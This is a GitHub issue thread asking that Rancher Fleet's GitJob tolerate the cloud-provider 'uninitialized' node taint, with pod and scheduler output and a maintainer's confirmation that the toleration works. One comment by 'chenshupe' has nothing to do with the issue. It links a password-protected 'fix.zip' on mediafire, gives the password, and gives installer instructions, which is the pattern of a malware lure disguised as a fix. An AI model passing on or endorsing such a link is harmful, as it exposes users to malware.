### ISSUE TITLE
Tolerate cloudprovider taints

### ISSUE THREAD

**Issue by k0da** [rancher/fleet#2783]
### Is your feature request related to a problem?

We use fleet to bootstrap CPI on cluster.

So far gitjob fails to render manifests:
```sh
kubectl get po -n fleet-local
NAME                           READY   STATUS    RESTARTS   AGE
ca-injector-921a9-65676        0/1     Pending   0          12h
cert-manager-921a9-6wqfz       0/1     Pending   0          12h
external-dns-921a9-cv2pl       0/1     Pending   0          12h
fluent-operator-921a9-j5jns    0/1     Pending   0          12h
grafana-operator-921a9-dnsqf   0/1     Pending   0          12h
ira-controller-921a9-djsfw     0/1     Pending   0          12h
p8s-921a9-4cbnj                0/1     Pending   0          12h
vsphere-csi-921a9-vhjnw        0/1     Pending   0          12h
```

```
  Warning  FailedScheduling  11m (x151 over 12h)  default-scheduler  0/2 nodes are available: 2 node(s) had untolerated taint {node.cloudprovider.kubernetes.io/uninitialized: true}. preemption: 0/2 nodes are available: 2 Preemption is not helpful for scheduling.
```

### Solution you'd like

GitJob must tolerate common taint for cloud provider:
```
node.cloudprovider.kubernetes.io/uninitialized
```

This will allow to initially install and later maintain CPI from central place

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sbulage** [comment]
### System Information
| Rancher Version | Fleet Version |
|--------|--------|
| 2.10.0-alpha5 | fleet:v0.11.0-beta.3 | 

### Steps performed

- Created a `GitRepo` which deploys `nginx` application.
- Wait for a second to create pod.
- Navigated to `Kubernetes Job` created by `GitJob` to deploy application.
- Verified that `toleration` for `cloud provider uninitialized` is present on it.
(See below screenshot for details.)

**_Note: In latest version of Fleet jobs are removed immediately, I opened Rancher in 2 separate tabs to open jobs YAML before it get removed._**

<details>
<summary>Taints on GitJob's Job</summary>

![Image](https://github.com/user-attachments/assets/99d56eb3-9760-4b34-8ff6-657137f1dd14)

</details>
